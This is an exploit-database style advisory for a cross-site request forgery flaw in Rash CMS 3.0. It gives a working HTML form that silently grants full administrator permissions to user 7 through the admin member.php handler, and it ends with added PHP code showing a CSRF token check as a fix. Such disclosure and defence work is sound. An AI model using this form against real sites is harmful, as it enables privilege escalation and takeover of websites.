Rash CMS 3.0 Cross Site Request Forgery

Rash CMS version 3.0 suffers from a cross-site request forgery (CSRF) vulnerability.


MD5 | 6e46dcede56d7ec7d67b85b47034cc19

# Exploit Title: Rash CMS CSRF Vulnerability
# Exploit Author: Hesam Bazvand
# Contact: [email protected]
# Software Link: http://www.rashcms.com/rashcms.zip
# Version: 3.0
# Tested on: Windows 10 / Kali Linux
# Category: WebApps

*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#

Exploit :

<form action="http://localhost/rash/manager/pages/member.php"
method="POST">
<input type="text" name="task" value="update"><br>
<input type="text" name="accsess_admin_acc" value="1"><br>
<input type="text" name="newpost" value="1"><br>
<input type="text" name="editotherposts" value="1"><br>
<input type="text" name="backup" value="1"><br>
<input type="text" name="postmgr" value="1"><br>
<input type="text" name="comment" value="1"><br>
<input type="text" name="cat" value="1"><br>
<input type="text" name="block" value="1"><br>
<input type="text" name="extra" value="1"><br>
<input type="text" name="member" value="1"><br>
<input type="text" name="inbox" value="1"><br>
<input type="text" name="uc" value="1"><br>
<input type="text" name="banned" value="1"><br>
<input type="text" name="template" value="1"><br>
<input type="text" name="setting" value="1"><br>
<input type="text" name="permission" value="1"><br>
<input type="text" name="module" value="1"><br>
<input type="text" name="usrid" value="7"><br>
<input type="submit" value="Submit">
</form>
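
Every field in the form above is a static value, so the request relies only on the session cookie that the administrator's browser attaches automatically. The following is an added example, not code from Rash CMS or from the advisory's author: a per-session token check that a handler such as member.php could run before acting on a POST. The function names `csrf_token`, `csrf_field` and `csrf_require_valid`, and the `csrf_token` field name, are assumptions.

```php
<?php
// Added example: hypothetical CSRF guard, not part of Rash CMS.
// Assumes the admin panel keeps login state in a PHP session (PHP 7.3+).
declare(strict_types=1);

// Defence in depth: keep the session cookie off cross-site requests.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict']);
session_start();

// Return the session's token, creating it on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden input for the legitimate admin form to embed next to its fields.
function csrf_field(): string
{
    $value = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $value . '">';
}

// Stop any POST that does not carry the token bound to this session.
function csrf_require_valid(): void
{
    if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST') {
        return; // only state-changing requests are checked
    }
    $sent = $_POST['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    // Reject arrays and empty values; hash_equals compares in constant time.
    if (!is_string($sent) || $expected === '' || !hash_equals($expected, $sent)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
}

// Run the check first; the permission update for the posted usrid
// is reached only when the token matches.
csrf_require_valid();
```

A page on another origin cannot read the token from the administrator's session, so a form like the one above would be answered with 403.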
